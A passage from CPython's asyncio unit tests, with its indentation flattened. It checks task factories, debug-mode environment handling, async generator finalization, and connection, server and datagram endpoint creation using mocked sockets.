async def coro():
pass
factory = lambda loop, coro: MyTask(coro, loop=loop)
self.assertIsNone(self.loop.get_task_factory())
self.loop.set_task_factory(factory)
self.assertIs(self.loop.get_task_factory(), factory)
task = self.loop.create_task(coro())
self.assertTrue(isinstance(task, MyTask))
self.loop.run_until_complete(task)
self.loop.set_task_factory(None)
self.assertIsNone(self.loop.get_task_factory())
task = self.loop.create_task(coro())
self.assertTrue(isinstance(task, asyncio.Task))
self.assertFalse(isinstance(task, MyTask))
self.loop.run_until_complete(task)
def test_env_var_debug(self):
code = '\n'.join((
'import asyncio',
'loop = asyncio.get_event_loop()',
'print(loop.get_debug())'))
# Test with -E to not fail if the unit test was run with
# PYTHONASYNCIODEBUG set to a non-empty string
sts, stdout, stderr = assert_python_ok('-E', '-c', code)
self.assertEqual(stdout.rstrip(), b'False')
sts, stdout, stderr = assert_python_ok('-c', code,
PYTHONASYNCIODEBUG='',
PYTHONDEVMODE='')
self.assertEqual(stdout.rstrip(), b'False')
sts, stdout, stderr = assert_python_ok('-c', code,
PYTHONASYNCIODEBUG='1',
PYTHONDEVMODE='')
self.assertEqual(stdout.rstrip(), b'True')
sts, stdout, stderr = assert_python_ok('-E', '-c', code,
PYTHONASYNCIODEBUG='1')
self.assertEqual(stdout.rstrip(), b'False')
# -X dev
sts, stdout, stderr = assert_python_ok('-E', '-X', 'dev',
'-c', code)
self.assertEqual(stdout.rstrip(), b'True')
def test_create_task(self):
class MyTask(asyncio.Task):
pass
async def test():
pass
class EventLoop(base_events.BaseEventLoop):
def create_task(self, coro):
return MyTask(coro, loop=loop)
loop = EventLoop()
self.set_event_loop(loop)
coro = test()
task = asyncio.ensure_future(coro, loop=loop)
self.assertIsInstance(task, MyTask)
# make warnings quiet
task._log_destroy_pending = False
coro.close()
def test_create_named_task_with_default_factory(self):
async def test():
pass
loop = asyncio.new_event_loop()
task = loop.create_task(test(), name='test_task')
try:
self.assertEqual(task.get_name(), 'test_task')
finally:
loop.run_until_complete(task)
loop.close()
def test_create_named_task_with_custom_factory(self):
def task_factory(loop, coro):
return asyncio.Task(coro, loop=loop)
async def test():
pass
loop = asyncio.new_event_loop()
loop.set_task_factory(task_factory)
task = loop.create_task(test(), name='test_task')
try:
self.assertEqual(task.get_name(), 'test_task')
finally:
loop.run_until_complete(task)
loop.close()
def test_run_forever_keyboard_interrupt(self):
# Python issue #22601: ensure that the temporary task created by
# run_forever() consumes the KeyboardInterrupt and so don't log
# a warning
async def raise_keyboard_interrupt():
raise KeyboardInterrupt
self.loop._process_events = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
try:
self.loop.run_until_complete(raise_keyboard_interrupt())
except KeyboardInterrupt:
pass
self.loop.close()
support.gc_collect()
self.assertFalse(self.loop.call_exception_handler.called)
def test_run_until_complete_baseexception(self):
# Python issue #22429: run_until_complete() must not schedule a pending
# call to stop() if the future raised a BaseException
async def raise_keyboard_interrupt():
raise KeyboardInterrupt
self.loop._process_events = mock.Mock()
try:
self.loop.run_until_complete(raise_keyboard_interrupt())
except KeyboardInterrupt:
pass
def func():
self.loop.stop()
func.called = True
func.called = False
try:
self.loop.call_soon(func)
self.loop.run_forever()
except KeyboardInterrupt:
pass
self.assertTrue(func.called)
def test_single_selecter_event_callback_after_stopping(self):
# Python issue #25593: A stopped event loop may cause event callbacks
# to run more than once.
event_sentinel = object()
callcount = 0
doer = None
def proc_events(event_list):
nonlocal doer
if event_sentinel in event_list:
doer = self.loop.call_soon(do_event)
def do_event():
nonlocal callcount
callcount += 1
self.loop.call_soon(clear_selector)
def clear_selector():
doer.cancel()
self.loop._selector.select.return_value = ()
self.loop._process_events = proc_events
self.loop._selector.select.return_value = (event_sentinel,)
for i in range(1, 3):
with self.subTest('Loop %d/2' % i):
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(callcount, 1)
def test_run_once(self):
# Simple test for test_utils.run_once(). It may seem strange
# to have a test for this (the function isn't even used!) but
# it's a de-factor standard API for library tests. This tests
# the idiom: loop.call_soon(loop.stop); loop.run_forever().
count = 0
def callback():
nonlocal count
count += 1
self.loop._process_events = mock.Mock()
self.loop.call_soon(callback)
test_utils.run_once(self.loop)
self.assertEqual(count, 1)
def test_run_forever_pre_stopped(self):
# Test that the old idiom for pre-stopping the loop works.
self.loop._process_events = mock.Mock()
self.loop.stop()
self.loop.run_forever()
self.loop._selector.select.assert_called_once_with(0)
async def leave_unfinalized_asyncgen(self):
# Create an async generator, iterate it partially, and leave it
# to be garbage collected.
# Used in async generator finalization tests.
# Depends on implementation details of garbage collector. Changes
# in gc may break this function.
status = {'started': False,
'stopped': False,
'finalized': False}
async def agen():
status['started'] = True
try:
for item in ['ZERO', 'ONE', 'TWO', 'THREE', 'FOUR']:
yield item
finally:
status['finalized'] = True
ag = agen()
ai = ag.__aiter__()
async def iter_one():
try:
item = await ai.__anext__()
except StopAsyncIteration:
return
if item == 'THREE':
status['stopped'] = True
return
asyncio.create_task(iter_one())
asyncio.create_task(iter_one())
return status
def test_asyncgen_finalization_by_gc(self):
# Async generators should be finalized when garbage collected.
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
with support.disable_gc():
status = self.loop.run_until_complete(self.leave_unfinalized_asyncgen())
while not status['stopped']:
test_utils.run_briefly(self.loop)
self.assertTrue(status['started'])
self.assertTrue(status['stopped'])
self.assertFalse(status['finalized'])
support.gc_collect()
test_utils.run_briefly(self.loop)
self.assertTrue(status['finalized'])
def test_asyncgen_finalization_by_gc_in_other_thread(self):
# Python issue 34769: If garbage collector runs in another
# thread, async generators will not finalize in debug
# mode.
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
self.loop.set_debug(True)
with support.disable_gc():
status = self.loop.run_until_complete(self.leave_unfinalized_asyncgen())
while not status['stopped']:
test_utils.run_briefly(self.loop)
self.assertTrue(status['started'])
self.assertTrue(status['stopped'])
self.assertFalse(status['finalized'])
self.loop.run_until_complete(
self.loop.run_in_executor(None, support.gc_collect))
test_utils.run_briefly(self.loop)
self.assertTrue(status['finalized'])
class MyProto(asyncio.Protocol):
done = None
def __init__(self, create_future=False):
self.state = 'INITIAL'
self.nbytes = 0
if create_future:
self.done = asyncio.get_running_loop().create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, create_future=False, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if create_future:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class BaseEventLoopWithSelectorTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = asyncio.SelectorEventLoop()
self.set_event_loop(self.loop)
@mock.patch('socket.getnameinfo')
def test_getnameinfo(self, m_gai):
m_gai.side_effect = lambda *args: 42
r = self.loop.run_until_complete(self.loop.getnameinfo(('abc', 123)))
self.assertEqual(r, 42)
@patch_socket
def test_create_connection_multiple_errors(self, m_socket):
class MyProto(asyncio.Protocol):
pass
async def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('107.6.106.82', 80)),
(2, 1, 6, '', ('107.6.106.82', 80))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
idx = -1
errors = ['err1', 'err2']
def _socket(*args, **kw):
nonlocal idx, errors
idx += 1
raise OSError(errors[idx])
m_socket.socket = _socket
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(MyProto, 'example.com', 80)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(coro)
self.assertEqual(str(cm.exception), 'Multiple exceptions: err1, err2')
@patch_socket
def test_create_connection_timeout(self, m_socket):
# Ensure that the socket is closed on timeout
sock = mock.Mock()
m_socket.socket.return_value = sock
def getaddrinfo(*args, **kw):
fut = self.loop.create_future()
addr = (socket.AF_INET, socket.SOCK_STREAM, 0, '',
('127.0.0.1', 80))
fut.set_result([addr])
return fut
self.loop.getaddrinfo = getaddrinfo
with mock.patch.object(self.loop, 'sock_connect',
side_effect=asyncio.TimeoutError):
coro = self.loop.create_connection(MyProto, '127.0.0.1', 80)
with self.assertRaises(asyncio.TimeoutError):
self.loop.run_until_complete(coro)
self.assertTrue(sock.close.called)
def test_create_connection_host_port_sock(self):
coro = self.loop.create_connection(
MyProto, 'example.com', 80, sock=object())
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_wrong_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_connection(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A Stream Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_server_wrong_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_server(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A Stream Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_server_ssl_timeout_for_plain_socket(self):
coro = self.loop.create_server(
MyProto, 'example.com', 80, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'no socket.SOCK_NONBLOCK (linux only)')
def test_create_server_stream_bittype(self):
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
with sock:
coro = self.loop.create_server(lambda: None, sock=sock)
srv = self.loop.run_until_complete(coro)
srv.close()
self.loop.run_until_complete(srv.wait_closed())
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'no IPv6 support')
def test_create_server_ipv6(self):
async def main():
srv = await asyncio.start_server(lambda: None, '::1', 0)
try:
self.assertGreater(len(srv.sockets), 0)
finally:
srv.close()
await srv.wait_closed()
try:
self.loop.run_until_complete(main())
except OSError as ex:
if (hasattr(errno, 'EADDRNOTAVAIL') and
ex.errno == errno.EADDRNOTAVAIL):
self.skipTest('failed to bind to ::1')
else:
raise
def test_create_datagram_endpoint_wrong_sock(self):
sock = socket.socket(socket.AF_INET)
with sock:
coro = self.loop.create_datagram_endpoint(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A UDP Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_connection_no_host_port_sock(self):
coro = self.loop.create_connection(MyProto)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_no_getaddrinfo(self):
async def getaddrinfo(*args, **kw):
return []
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(MyProto, 'example.com', 80)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_connection_connect_err(self):
async def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('107.6.106.82', 80))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_connection(MyProto, 'example.com', 80)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_connection_multiple(self):
async def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('0.0.0.1', 80)),
(2, 1, 6, '', ('0.0.0.2', 80))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET)
with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
@patch_socket
def test_create_connection_multiple_errors_local_addr(self, m_socket):
def bind(addr):
if addr[0] == '0.0.0.1':
err = OSError('Err')
err.strerror = 'Err'
raise err
m_socket.socket.return_value.bind = bind
async def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('0.0.0.1', 80)),
(2, 1, 6, '', ('0.0.0.2', 80))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError('Err2')
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET,
local_addr=(None, 8080))
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(coro)
self.assertTrue(str(cm.exception).startswith('Multiple exceptions: '))
self.assertTrue(m_socket.socket.return_value.close.called)
def _test_create_connection_ip_addr(self, m_socket, allow_inet_pton):
# Test the fallback code, even if this system has inet_pton.
if not allow_inet_pton:
del m_socket.inet_pton
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
coro = self.loop.create_connection(asyncio.Protocol, '1.2.3.4', 80)
t, p = self.loop.run_until_complete(coro)
try:
sock.connect.assert_called_with(('1.2.3.4', 80))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
if socket_helper.IPV6_ENABLED:
sock.family = socket.AF_INET6
coro = self.loop.create_connection(asyncio.Protocol, '::1', 80)
t, p = self.loop.run_until_complete(coro)
try:
# Without inet_pton we use getaddrinfo, which transforms
# ('::1', 80) to ('::1', 80, 0, 0). The last 0s are flow info,
# scope id.
[address] = sock.connect.call_args[0]
host, port = address[:2]
self.assertRegex(host, r'::(0\.)*1')
self.assertEqual(port, 80)
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET6)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'no IPv6 support')
@unittest.skipIf(sys.platform.startswith('aix'),
"bpo-25545: IPv6 scope id and getaddrinfo() behave differently on AIX")
@patch_socket
def test_create_connection_ipv6_scope(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
sock.family = socket.AF_INET6
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
coro = self.loop.create_connection(asyncio.Protocol, 'fe80::1%1', 80)
t, p = self.loop.run_until_complete(coro)
try:
sock.connect.assert_called_with(('fe80::1', 80, 0, 1))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET6)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
@patch_socket
def test_create_connection_ip_addr(self, m_socket):
self._test_create_connection_ip_addr(m_socket, True)
@patch_socket
def test_create_connection_no_inet_pton(self, m_socket):
self._test_create_connection_ip_addr(m_socket, False)
@patch_socket
def test_create_connection_service_name(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
for service, port in ('http', 80), (b'http', 80):
coro = self.loop.create_connection(asyncio.Protocol,
'127.0.0.1', service)
t, p = self.loop.run_until_complete(coro)
try:
sock.connect.assert_called_with(('127.0.0.1', port))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
for service in 'nonsense', b'nonsense':
coro = self.loop.create_connection(asyncio.Protocol,
'127.0.0.1', service)
with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
def test_create_connection_no_local_addr(self):
async def getaddrinfo(host, *args, **kw):
if host == 'example.com':
return [(2, 1, 6, '', ('107.6.106.82', 80)),
(2, 1, 6, '', ('107.6.106.82', 80))]
else:
return []
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET,
local_addr=(None, 8080))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_connection_bluetooth(self, m_socket):
# See http://bugs.python.org/issue27136, fallback to getaddrinfo when
# we can't recognize an address is resolved, e.g. a Bluetooth address.
addr = ('00:01:02:03:04:05', 1)
def getaddrinfo(host, port, *args, **kw):
assert (host, port) == addr
return [(999, 1, 999, '', (addr, 1))]
m_socket.getaddrinfo = getaddrinfo
sock = m_socket.socket()
coro = self.loop.sock_connect(sock, addr)
self.loop.run_until_complete(coro)
def test_create_connection_ssl_server_hostname_default(self):
self.loop.getaddrinfo = mock.Mock()
def mock_getaddrinfo(*args, **kwds):
f = self.loop.create_future()
f.set_result([(socket.AF_INET, socket.SOCK_STREAM,
socket.SOL_TCP, '', ('1.2.3.4', 80))])
return f
self.loop.getaddrinfo.side_effect = mock_getaddrinfo
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.return_value = self.loop.create_future()
self.loop.sock_connect.return_value.set_result(None)
self.loop._make_ssl_transport = mock.Mock()
class _SelectorTransportMock:
_sock = None
def get_extra_info(self, key):
return mock.Mock()
def close(self):
self._sock.close()
def mock_make_ssl_transport(sock, protocol, sslcontext, waiter,
**kwds):
waiter.set_result(None)
transport = _SelectorTransportMock()
transport._sock = sock
return transport
self.loop._make_ssl_transport.side_effect = mock_make_ssl_transport
ANY = mock.ANY
handshake_timeout = object()
# First try the default server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='python.org',
ssl_handshake_timeout=handshake_timeout)
# Next try an explicit server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
server_hostname='perl.com',
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='perl.com',
ssl_handshake_timeout=handshake_timeout)
# Finally try an explicit empty server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
server_hostname='',
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='',
ssl_handshake_timeout=handshake_timeout)
def test_create_connection_no_ssl_server_hostname_errors(self):
# When not using ssl, server_hostname must be None.
coro = self.loop.create_connection(MyProto, 'python.org', 80,
server_hostname='')
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
coro = self.loop.create_connection(MyProto, 'python.org', 80,
server_hostname='python.org')
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_ssl_server_hostname_errors(self):
# When using ssl, server_hostname may be None if host is non-empty.
coro = self.loop.create_connection(MyProto, '', 80, ssl=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
coro = self.loop.create_connection(MyProto, None, 80, ssl=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
sock = socket.socket()
coro = self.loop.create_connection(MyProto, None, None,
ssl=True, sock=sock)
self.addCleanup(sock.close)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_ssl_timeout_for_plain_socket(self):
coro = self.loop.create_connection(
MyProto, 'example.com', 80, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
def test_create_server_empty_host(self):
# if host is empty string use None instead
host = object()
async def getaddrinfo(*args, **kw):
nonlocal host
host = args[0]
return []
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
self.loop.getaddrinfo = getaddrinfo_task
fut = self.loop.create_server(MyProto, '', 0)
self.assertRaises(OSError, self.loop.run_until_complete, fut)
self.assertIsNone(host)
def test_create_server_host_port_sock(self):
fut = self.loop.create_server(
MyProto, '0.0.0.0', 0, sock=object())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_server_no_host_port_sock(self):
fut = self.loop.create_server(MyProto)
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_server_no_getaddrinfo(self):
getaddrinfo = self.loop.getaddrinfo = mock.Mock()
getaddrinfo.return_value = self.loop.create_future()
getaddrinfo.return_value.set_result(None)
f = self.loop.create_server(MyProto, 'python.org', 0)
self.assertRaises(OSError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_nosoreuseport(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
del m_socket.SO_REUSEPORT
m_socket.socket.return_value = mock.Mock()
f = self.loop.create_server(
MyProto, '0.0.0.0', 0, reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_soreuseport_only_defined(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
m_socket.socket.return_value = mock.Mock()
m_socket.SO_REUSEPORT = -1
f = self.loop.create_server(
MyProto, '0.0.0.0', 0, reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_cant_bind(self, m_socket):
class Err(OSError):
strerror = 'error'
m_socket.getaddrinfo.return_value = [
(2, 1, 6, '', ('127.0.0.1', 10100))]
m_socket.getaddrinfo._is_coroutine = False
m_sock = m_socket.socket.return_value = mock.Mock()
m_sock.bind.side_effect = Err
fut = self.loop.create_server(MyProto, '0.0.0.0', 0)
self.assertRaises(OSError, self.loop.run_until_complete, fut)
self.assertTrue(m_sock.close.called)
@patch_socket
def test_create_datagram_endpoint_no_addrinfo(self, m_socket):
m_socket.getaddrinfo.return_value = []
m_socket.getaddrinfo._is_coroutine = False
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('localhost', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_addr_error(self):
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr='localhost')
self.assertRaises(
AssertionError, self.loop.run_until_complete, coro)
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('localhost', 1, 2, 3))
self.assertRaises(
AssertionError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_connect_err(self):
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, remote_addr=('127.0.0.1', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_allow_broadcast(self):
protocol = MyDatagramProto(create_future=True, loop=self.loop)
self.loop.sock_connect = sock_connect = mock.Mock()
sock_connect.return_value = []
coro = self.loop.create_datagram_endpoint(
lambda: protocol,
remote_addr=('127.0.0.1', 0),
allow_broadcast=True)
transport, _ = self.loop.run_until_complete(coro)
self.assertFalse(sock_connect.called)
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@patch_socket
def test_create_datagram_endpoint_socket_err(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
m_socket.socket.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, family=socket.AF_INET)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, local_addr=('127.0.0.1', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_datagram_endpoint_no_matching_family(self):
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol,
remote_addr=('127.0.0.1', 0), local_addr=('::1', 0))
self.assertRaises(
ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_setblk_err(self, m_socket):
m_socket.socket.return_value.setblocking.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, family=socket.AF_INET)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
self.assertTrue(
m_socket.socket.return_value.close.called)
def test_create_datagram_endpoint_noaddr_nofamily(self):
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_cant_bind(self, m_socket):
class Err(OSError):
pass
m_socket.getaddrinfo = socket.getaddrinfo
m_sock = m_socket.socket.return_value = mock.Mock()
m_sock.bind.side_effect = Err
fut = self.loop.create_datagram_endpoint(
MyDatagramProto,
local_addr=('127.0.0.1', 0), family=socket.AF_INET)
self.assertRaises(Err, self.loop.run_until_complete, fut)
self.assertTrue(m_sock.close.called)
def test_create_datagram_endpoint_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('127.0.0.1', 0))
fut = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
sock=sock)
transport, protocol = self.loop.run_until_complete(fut)
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_datagram_endpoint_sock_unix(self):
fut = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
family=socket.AF_UNIX)
transport, protocol = self.loop.run_until_complete(fut)
assert transport._sock.family == socket.AF_UNIX
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@socket_helper.skip_unless_bind_unix_socket
def test_create_datagram_endpoint_existing_sock_unix(self):
with test_utils.unix_socket_path() as path:
sock = socket.socket(socket.AF_UNIX, type=socket.SOCK_DGRAM)
sock.bind(path)
sock.close()
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
path, family=socket.AF_UNIX)
transport, protocol = self.loop.run_until_complete(coro)
transport.close()
self.loop.run_until_complete(protocol.done)
def test_create_datagram_endpoint_sock_sockopts(self):
class FakeSock:
type = socket.SOCK_DGRAM
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('127.0.0.1', 0), sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, remote_addr=('127.0.0.1', 0), sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, family=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, proto=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, flags=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, reuse_port=True, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, allow_broadcast=True, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
@unittest.skipIf(sys.platform == 'vxworks',
"SO_BROADCAST is enabled by default on VxWorks")
def test_create_datagram_endpoint_sockopts(self):
# Socket options should not be applied unless asked for.
# SO_REUSEPORT is not available on all platforms.
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
local_addr=('127.0.0.1', 0))
transport, protocol = self.loop.run_until_complete(coro)
sock = transport.get_extra_info('socket')
reuseport_supported = hasattr(socket, 'SO_REUSEPORT')
if reuseport_supported:
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST))
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
local_addr=('127.0.0.1', 0),
reuse_port=reuseport_supported,
allow_broadcast=True)
transport, protocol = self.loop.run_until_complete(coro)
sock = transport.get_extra_info('socket')
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR))
if reuseport_supported:
self.assertTrue(
sock.getsockopt(
